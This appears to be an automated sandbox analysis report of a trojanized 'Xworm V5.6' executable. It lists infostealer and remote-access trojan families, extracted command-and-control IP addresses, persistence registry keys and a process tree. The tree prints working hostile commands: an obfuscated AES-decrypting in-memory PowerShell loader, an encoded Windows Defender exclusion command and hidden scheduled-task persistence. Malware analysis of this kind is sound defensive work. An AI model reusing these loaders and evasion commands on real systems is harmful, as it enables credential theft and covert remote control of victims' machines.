redline | 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727

Analysis

max time kernel
120s
max time network
121s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29-06-2024 16:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xworm V5.6.exe
Size

15.6MB
MD5

ad3893ee2a8e40f2700236672635f5aa
SHA1

80f3c0bc398c473e32eeb1420218be6a5feb291d
SHA256

1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727
SHA512

748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111
SSDEEP

196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6

Score

10^/10

redline sectoprat stormkitty xworm cracked execution infostealer persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

94.156.8.186:7000

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Extracted

Family

redline

Botnet

cracked

94.156.8.186:37552

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/3712-373-0x000000000C0A0000-0x000000000C0AE000-memory.dmp	disable_win_def

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3712-268-0x0000000004E00000-0x0000000004E16000-memory.dmp	family_xworm

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2216-272-0x00000000048A0000-0x00000000048BE000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2216-272-0x00000000048A0000-0x00000000048BE000-memory.dmp	family_sectoprat

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3712-372-0x000000000A9B0000-0x000000000AACE000-memory.dmp	family_stormkitty

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1584 powershell.exe
3152 powershell.exe
1620 powershell.exe
4588 powershell.exe
4860 powershell.exe
3500 powershell.exe
5048 powershell.exe

pid	process
1584	powershell.exe
3152	powershell.exe
1620	powershell.exe
4588	powershell.exe
4860	powershell.exe
3500	powershell.exe
5048	powershell.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

startup_str_600.bat.exeXworm V5.6.exexfixer.bat.exexworm.bat.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	startup_str_600.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	Xworm V5.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	xfixer.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	xworm.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 5 IoCs

Processes:

Xworm V5.6.exexworm.bat.exexfixer.bat.exestartup_str_600.bat.exestartup_str_437.bat.exe

pid process

64 Xworm V5.6.exe
1284 xworm.bat.exe
1856 xfixer.bat.exe
3712 startup_str_600.bat.exe
2216 startup_str_437.bat.exe

pid	process
64	Xworm V5.6.exe
1284	xworm.bat.exe
1856	xfixer.bat.exe
3712	startup_str_600.bat.exe
2216	startup_str_437.bat.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

startup_str_600.bat.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	startup_str_600.bat.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
16	ip-api.com

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe

Modifies registry class 2 IoCs

Processes:

xfixer.bat.exexworm.bat.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	xfixer.bat.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	xworm.bat.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

startup_str_600.bat.exe

pid process

3712 startup_str_600.bat.exe

pid	process
3712	startup_str_600.bat.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

powershell.exexworm.bat.exexfixer.bat.exepowershell.exepowershell.exepowershell.exepowershell.exestartup_str_600.bat.exestartup_str_437.bat.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exe

pid	process
5048	powershell.exe
5048	powershell.exe
1284	xworm.bat.exe
1856	xfixer.bat.exe
1284	xworm.bat.exe
1856	xfixer.bat.exe
5004	powershell.exe
4968	powershell.exe
5004	powershell.exe
4968	powershell.exe
3500	powershell.exe
4860	powershell.exe
4860	powershell.exe
3500	powershell.exe
3712	startup_str_600.bat.exe
2216	startup_str_437.bat.exe
3712	startup_str_600.bat.exe
2216	startup_str_437.bat.exe
1896	powershell.exe
1896	powershell.exe
1896	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
1584	powershell.exe
1584	powershell.exe
3152	powershell.exe
3152	powershell.exe
3152	powershell.exe
1620	powershell.exe
1620	powershell.exe
1620	powershell.exe
4588	powershell.exe
4588	powershell.exe
4588	powershell.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exexworm.bat.exexfixer.bat.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	1284	xworm.bat.exe
Token: SeDebugPrivilege	1856	xfixer.bat.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeIncreaseQuotaPrivilege	4968	powershell.exe
Token: SeSecurityPrivilege	4968	powershell.exe
Token: SeTakeOwnershipPrivilege	4968	powershell.exe
Token: SeLoadDriverPrivilege	4968	powershell.exe
Token: SeSystemProfilePrivilege	4968	powershell.exe
Token: SeSystemtimePrivilege	4968	powershell.exe
Token: SeProfSingleProcessPrivilege	4968	powershell.exe
Token: SeIncBasePriorityPrivilege	4968	powershell.exe
Token: SeCreatePagefilePrivilege	4968	powershell.exe
Token: SeBackupPrivilege	4968	powershell.exe
Token: SeRestorePrivilege	4968	powershell.exe
Token: SeShutdownPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeSystemEnvironmentPrivilege	4968	powershell.exe
Token: SeRemoteShutdownPrivilege	4968	powershell.exe
Token: SeUndockPrivilege	4968	powershell.exe
Token: SeManageVolumePrivilege	4968	powershell.exe
Token: 33	4968	powershell.exe
Token: 34	4968	powershell.exe
Token: 35	4968	powershell.exe
Token: 36	4968	powershell.exe
Token: SeIncreaseQuotaPrivilege	5004	powershell.exe
Token: SeSecurityPrivilege	5004	powershell.exe
Token: SeTakeOwnershipPrivilege	5004	powershell.exe
Token: SeLoadDriverPrivilege	5004	powershell.exe
Token: SeSystemProfilePrivilege	5004	powershell.exe
Token: SeSystemtimePrivilege	5004	powershell.exe
Token: SeProfSingleProcessPrivilege	5004	powershell.exe
Token: SeIncBasePriorityPrivilege	5004	powershell.exe
Token: SeCreatePagefilePrivilege	5004	powershell.exe
Token: SeBackupPrivilege	5004	powershell.exe
Token: SeRestorePrivilege	5004	powershell.exe
Token: SeShutdownPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeSystemEnvironmentPrivilege	5004	powershell.exe
Token: SeRemoteShutdownPrivilege	5004	powershell.exe
Token: SeUndockPrivilege	5004	powershell.exe
Token: SeManageVolumePrivilege	5004	powershell.exe
Token: 33	5004	powershell.exe
Token: 34	5004	powershell.exe
Token: 35	5004	powershell.exe
Token: 36	5004	powershell.exe
Token: SeDebugPrivilege	3500	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeIncreaseQuotaPrivilege	4860	powershell.exe
Token: SeSecurityPrivilege	4860	powershell.exe
Token: SeTakeOwnershipPrivilege	4860	powershell.exe
Token: SeLoadDriverPrivilege	4860	powershell.exe
Token: SeSystemProfilePrivilege	4860	powershell.exe
Token: SeSystemtimePrivilege	4860	powershell.exe
Token: SeProfSingleProcessPrivilege	4860	powershell.exe
Token: SeIncBasePriorityPrivilege	4860	powershell.exe
Token: SeCreatePagefilePrivilege	4860	powershell.exe
Token: SeBackupPrivilege	4860	powershell.exe
Token: SeRestorePrivilege	4860	powershell.exe
Token: SeShutdownPrivilege	4860	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeSystemEnvironmentPrivilege	4860	powershell.exe
Token: SeRemoteShutdownPrivilege	4860	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

taskmgr.exe

pid	process
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe

Suspicious use of SendNotifyMessage 25 IoCs

Processes:

taskmgr.exe

pid	process
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe
2000	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Xworm V5.6.execmd.execmd.exexfixer.bat.exexworm.bat.exeWScript.exeWScript.execmd.execmd.exestartup_str_600.bat.exestartup_str_437.bat.exe

description	pid	process	target process
PID 4712 wrote to memory of 5048	4712	Xworm V5.6.exe	powershell.exe
PID 4712 wrote to memory of 5048	4712	Xworm V5.6.exe	powershell.exe
PID 4712 wrote to memory of 5048	4712	Xworm V5.6.exe	powershell.exe
PID 4712 wrote to memory of 3368	4712	Xworm V5.6.exe	cmd.exe
PID 4712 wrote to memory of 3368	4712	Xworm V5.6.exe	cmd.exe
PID 4712 wrote to memory of 3368	4712	Xworm V5.6.exe	cmd.exe
PID 4712 wrote to memory of 3676	4712	Xworm V5.6.exe	cmd.exe
PID 4712 wrote to memory of 3676	4712	Xworm V5.6.exe	cmd.exe
PID 4712 wrote to memory of 3676	4712	Xworm V5.6.exe	cmd.exe
PID 4712 wrote to memory of 64	4712	Xworm V5.6.exe	Xworm V5.6.exe
PID 4712 wrote to memory of 64	4712	Xworm V5.6.exe	Xworm V5.6.exe
PID 3368 wrote to memory of 1284	3368	cmd.exe	xworm.bat.exe
PID 3368 wrote to memory of 1284	3368	cmd.exe	xworm.bat.exe
PID 3368 wrote to memory of 1284	3368	cmd.exe	xworm.bat.exe
PID 3676 wrote to memory of 1856	3676	cmd.exe	xfixer.bat.exe
PID 3676 wrote to memory of 1856	3676	cmd.exe	xfixer.bat.exe
PID 3676 wrote to memory of 1856	3676	cmd.exe	xfixer.bat.exe
PID 1856 wrote to memory of 5004	1856	xfixer.bat.exe	powershell.exe
PID 1856 wrote to memory of 5004	1856	xfixer.bat.exe	powershell.exe
PID 1856 wrote to memory of 5004	1856	xfixer.bat.exe	powershell.exe
PID 1284 wrote to memory of 4968	1284	xworm.bat.exe	powershell.exe
PID 1284 wrote to memory of 4968	1284	xworm.bat.exe	powershell.exe
PID 1284 wrote to memory of 4968	1284	xworm.bat.exe	powershell.exe
PID 1284 wrote to memory of 3500	1284	xworm.bat.exe	powershell.exe
PID 1284 wrote to memory of 3500	1284	xworm.bat.exe	powershell.exe
PID 1284 wrote to memory of 3500	1284	xworm.bat.exe	powershell.exe
PID 1856 wrote to memory of 4860	1856	xfixer.bat.exe	powershell.exe
PID 1856 wrote to memory of 4860	1856	xfixer.bat.exe	powershell.exe
PID 1856 wrote to memory of 4860	1856	xfixer.bat.exe	powershell.exe
PID 1856 wrote to memory of 1084	1856	xfixer.bat.exe	WScript.exe
PID 1856 wrote to memory of 1084	1856	xfixer.bat.exe	WScript.exe
PID 1856 wrote to memory of 1084	1856	xfixer.bat.exe	WScript.exe
PID 1284 wrote to memory of 1588	1284	xworm.bat.exe	WScript.exe
PID 1284 wrote to memory of 1588	1284	xworm.bat.exe	WScript.exe
PID 1284 wrote to memory of 1588	1284	xworm.bat.exe	WScript.exe
PID 1084 wrote to memory of 3340	1084	WScript.exe	cmd.exe
PID 1084 wrote to memory of 3340	1084	WScript.exe	cmd.exe
PID 1084 wrote to memory of 3340	1084	WScript.exe	cmd.exe
PID 1588 wrote to memory of 4624	1588	WScript.exe	cmd.exe
PID 1588 wrote to memory of 4624	1588	WScript.exe	cmd.exe
PID 1588 wrote to memory of 4624	1588	WScript.exe	cmd.exe
PID 3340 wrote to memory of 3712	3340	cmd.exe	startup_str_600.bat.exe
PID 3340 wrote to memory of 3712	3340	cmd.exe	startup_str_600.bat.exe
PID 3340 wrote to memory of 3712	3340	cmd.exe	startup_str_600.bat.exe
PID 4624 wrote to memory of 2216	4624	cmd.exe	startup_str_437.bat.exe
PID 4624 wrote to memory of 2216	4624	cmd.exe	startup_str_437.bat.exe
PID 4624 wrote to memory of 2216	4624	cmd.exe	startup_str_437.bat.exe
PID 3712 wrote to memory of 1896	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 1896	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 1896	3712	startup_str_600.bat.exe	powershell.exe
PID 2216 wrote to memory of 4532	2216	startup_str_437.bat.exe	powershell.exe
PID 2216 wrote to memory of 4532	2216	startup_str_437.bat.exe	powershell.exe
PID 2216 wrote to memory of 4532	2216	startup_str_437.bat.exe	powershell.exe
PID 3712 wrote to memory of 1584	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 1584	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 1584	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 3152	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 3152	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 3152	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 1620	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 1620	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 1620	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 4588	3712	startup_str_600.bat.exe	powershell.exe
PID 3712 wrote to memory of 4588	3712	startup_str_600.bat.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
"C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3368

C:\Users\Admin\AppData\Roaming\xworm.bat.exe
"xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xworm')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_437_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_437.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_437.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_437.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:4624

C:\Users\Admin\AppData\Roaming\startup_str_437.bat.exe
"startup_str_437.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_437.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_437')
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3676

C:\Users\Admin\AppData\Roaming\xfixer.bat.exe
"xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xfixer')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_600_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_600.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_600.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_600.bat" "
5⤵
